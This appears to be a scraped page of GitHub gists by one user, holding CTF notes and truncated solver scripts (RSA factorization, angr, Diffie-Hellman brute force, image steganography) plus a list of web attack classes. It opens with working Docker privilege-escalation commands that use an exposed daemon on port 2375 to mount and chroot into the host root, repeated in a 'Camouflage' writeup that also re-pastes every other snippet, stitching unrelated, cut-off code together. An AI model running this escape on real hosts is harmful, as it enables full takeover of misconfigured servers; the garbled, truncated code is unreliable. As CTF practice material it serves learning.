RDxR10

## Docker Privilege Escalation : Misconfigured Docker Socket Notes
netstat -tlp
curl localhost:2375/version   //unencrypted connections on port 2375
export DOCKER_HOST="tcp://localhost:2375"
docker images //images available on local machine
docker run -it -v /:/host/ ubuntu:18.04 bash //starting an ubuntu container
cd /host/      //directory change to /host/
ls -l
chroot ./ bash
find / -name flag 2>/dev/null //Finding the flag location
cat /root/flag //To get the flag content

## sei_extra.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                RDxR10
                / sei_extra.md
            
            
              Created
              November 26, 2022 16:13
            
          
Web Cache Deception
XXE - IN/OUT bound
SSRF
WS Hijacking
Deserialization
SSTI
RCE
CVEs
JS Memory Leak (QA??)
Overflows


## illusion.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                RDxR10
                / illusion.md
            
            
              Created
              May 26, 2021 12:45
            
          
## Factorize_method_A.py
import random
from math import gcd
n = 113138904645172037883970365829067951997230612719077573521906183509830180342554841790268134999423971247602095979484887092205889453631416247856139838680189062511282674134361726455828113825651055263796576482555849771303361415911103661873954509376979834006775895197929252775133737380642752081153063469135950168223
e = 65537
d = 87345713405055532428664184040885638635456003191089749453199952101307167014234779974982171268609415280584641472420424299514002514548043646741981648196634644960356958819956637431278502574332925957523028825580469419959164626563649612912919564472132340496010962167627957743115660323378023656051813802028938198977

k = e*d - 1
g = random.randint(2, n - 1)
t = k

## ucf.txt
ucf details

clk
reset
RS232_Uart_1_sin
RS232_Uart_1_sout

lvcmos
33
15

## pixelify-solve_darkCON.py
from PIL import Image
from numpy import *
import base64

img = Image.open('inject.png')
numpydata = asarray(img)

color_array = []
for row in numpydata:
	for columns in row:

## babymix-DiceGang-CTF-2021.py
#!/usr/bin/env python3

import angr
import claripy

if __name__ == '__main__':
    print("[+] Solver Started")

    binary = "./babymix"
    flag_length = 0x16

## UTCTF-2021-Illegal-Prime.py
from Crypto.Util.number import long_to_bytes
c = 0x2f7f63b5e27343dcf750bf83fb4893fe3b20a87e81e6fb62c33d30
p = 56594044391339477686029513026021974392498922525513994709310909529135745009448534622250639333011770158535778535848522177601610597930145120019374953248865595853915254057748042248348224821499113613633807994411737092129239655022633988633736058693251230631716531822464530907151
b = long_to_bytes(p)
a = 0x5a0b05d9831438ac8561d2b0a42be1cf5613db21deb9a443e21c4d # from b
print(bytes.fromhex(hex(a ^ c)[2:]).decode("ASCII"))

## UTCTF-2021-Small-P-bruteDH.py
p = 69691
g = 1001
A = 17016
B = 47643
arr = []
arr1 = []

for a in range(1, p):
    if pow(g, a, p) == A:
       arr.append(a)

## Camouflage_darkCON_writeup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                RDxR10
                / Camouflage_darkCON_writeup.md
            
            
              Last active
              February 22, 2021 15:43
            
          
    steghide extract -sf sound.wav

-> We get a vbs.bmp file
steghide extract -sf vbs.bmp

-> We get a file named inf.txt having this as info (for Signal Processing)
	netstat -tlp
	curl localhost:2375/version //unencrypted connections on port 2375
	export DOCKER_HOST="tcp://localhost:2375"
	docker images //images available on local machine
	docker run -it -v /:/host/ ubuntu:18.04 bash //starting an ubuntu container
	cd /host/ //directory change to /host/
	ls -l
	chroot ./ bash
	find / -name flag 2>/dev/null //Finding the flag location
	cat /root/flag //To get the flag content
	import random
	from math import gcd
	n = 113138904645172037883970365829067951997230612719077573521906183509830180342554841790268134999423971247602095979484887092205889453631416247856139838680189062511282674134361726455828113825651055263796576482555849771303361415911103661873954509376979834006775895197929252775133737380642752081153063469135950168223
	e = 65537
	d = 87345713405055532428664184040885638635456003191089749453199952101307167014234779974982171268609415280584641472420424299514002514548043646741981648196634644960356958819956637431278502574332925957523028825580469419959164626563649612912919564472132340496010962167627957743115660323378023656051813802028938198977

	k = e*d - 1
	g = random.randint(2, n - 1)
	t = k
	ucf details

	clk
	reset
	RS232_Uart_1_sin
	RS232_Uart_1_sout

	lvcmos
	33
	15
	from PIL import Image
	from numpy import *
	import base64

	img = Image.open('inject.png')
	numpydata = asarray(img)

	color_array = []
	for row in numpydata:
	for columns in row:
	#!/usr/bin/env python3

	import angr
	import claripy

	if __name__ == '__main__':
	print("[+] Solver Started")

	binary = "./babymix"
	flag_length = 0x16
	from Crypto.Util.number import long_to_bytes
	c = 0x2f7f63b5e27343dcf750bf83fb4893fe3b20a87e81e6fb62c33d30
	p = 56594044391339477686029513026021974392498922525513994709310909529135745009448534622250639333011770158535778535848522177601610597930145120019374953248865595853915254057748042248348224821499113613633807994411737092129239655022633988633736058693251230631716531822464530907151
	b = long_to_bytes(p)
	a = 0x5a0b05d9831438ac8561d2b0a42be1cf5613db21deb9a443e21c4d # from b
	print(bytes.fromhex(hex(a ^ c)[2:]).decode("ASCII"))
	p = 69691
	g = 1001
	A = 17016
	B = 47643
	arr = []
	arr1 = []

	for a in range(1, p):
	if pow(g, a, p) == A:
	arr.append(a)